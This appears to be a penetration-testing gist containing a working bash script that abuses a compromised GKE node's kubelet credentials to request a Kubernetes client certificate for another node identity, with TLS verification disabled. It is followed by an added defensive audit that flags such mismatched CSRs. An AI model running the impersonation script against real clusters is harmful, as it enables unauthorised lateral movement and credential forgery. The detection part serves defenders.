Quick script used during some exploratory GKE/k8s cluster pen-testing. Goal was to use a compromised node's kubelet to move laterally through the cluster to other nodes and API objects.
#!/bin/bash
set -e
NODE_NAME="${NODE_NAME:-random-node-name}"
KUBE_API="${KUBE_API:-35.226.10.2}"
KUBELET_KEY="${KUBELET_KEY:-/etc/srv/kubernetes/pki/kubelet.key}"
KUBELET_CERT="${KUBELET_CERT:-/etc/srv/kubernetes/pki/kubelet.crt}"
WORKDIR="$(mktemp -d /tmp/foo.XXXXX)"
echo "==> Creating new key + CSR: $WORKDIR/k8shack.{key,csr}"
openssl req -nodes -newkey rsa:2048 -keyout "$WORKDIR/k8shack.key" -out "$WORKDIR/k8shack.csr" -subj "/O=system:nodes/CN=system:node:${NODE_NAME}"
echo "==> Creating k8s CertificateSigningRequest yaml: $WORKDIR/k8shack-csr.yaml"
cat <<EOF >"$WORKDIR/k8shack-csr.yaml"
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
  name: node-csr-$NODE_NAME-$(date +%s)
spec:
  groups:
  - system:nodes
  request: $(cat "$WORKDIR/k8shack.csr" | base64 | tr -d '\n')
  usages:
  - digital signature
  - key encipherment
  - client auth
EOF
echo "==> Uploading CSR yaml to k8s api"
kubectl --insecure-skip-tls-verify \
  --client-certificate "$KUBELET_CERT" \
  --client-key "$KUBELET_KEY" \
  --server https://"$KUBE_API" \
  create -f "$WORKDIR/k8shack-csr.yaml"
echo "==> Sleeping 3 seconds to give the API time to process the CSR... "
sleep 3
echo "==> Status of Pending CSR:"
kubectl --client-certificate "$KUBELET_CERT" \
  --client-key "$KUBELET_KEY" \
  --insecure-skip-tls-verify \
  --server https://"$KUBE_API" \
  get certificatesigningrequests
rm -rf -- "$WORKDIR"
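
A defender-side check for the kind of request this script submits, added here as an example and not part of the original gist: it lists CertificateSigningRequests and flags any filed by a `system:node:*` identity whose embedded PKCS#10 subject CN names something other than that identity. The function names are hypothetical, and it assumes `kubectl` read access to CSR objects plus the `openssl` CLI.

```shell
# Added example: audit CertificateSigningRequests for node-identity mismatches.
# Function names are hypothetical; requires kubectl (read access to CSRs) and openssl.

# csr_cns B64_PEM: print every subject commonName in a CSR taken from .spec.request.
# "-nameopt multiline" puts each attribute on its own line, so text inside another
# attribute (for example an O value containing "CN=") cannot be mistaken for a CN.
csr_cns() {
  printf '%s' "$1" | openssl base64 -d -A \
    | openssl req -noout -subject -nameopt multiline 2>/dev/null \
    | sed -n 's/^ *commonName *= //p'
}

# csr_matches_requester REQUESTER B64_PEM: 0 if every CN equals the requester.
# An unparsable request or one without a CN counts as a mismatch.
csr_matches_requester() {
  cns="$(csr_cns "$2")"
  [ -n "$cns" ] || return 1
  ! printf '%s\n' "$cns" | grep -qvxF -- "$1"
}

# audit_node_csrs: report CSRs filed by a node identity for a different subject.
audit_node_csrs() {
  tab="$(printf '\t')"
  kubectl get csr -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.username}{"\t"}{.spec.request}{"\n"}{end}' |
  while IFS="$tab" read -r name user req; do
    case "$user" in system:node:*) ;; *) continue ;; esac
    csr_matches_requester "$user" "$req" ||
      echo "MISMATCH csr=$name requester=$user cn=$(csr_cns "$req" | tr '\n' ' ')"
  done
}
```

Run `audit_node_csrs` with a read-only credential; each MISMATCH line is a node credential asking for a client certificate in another name.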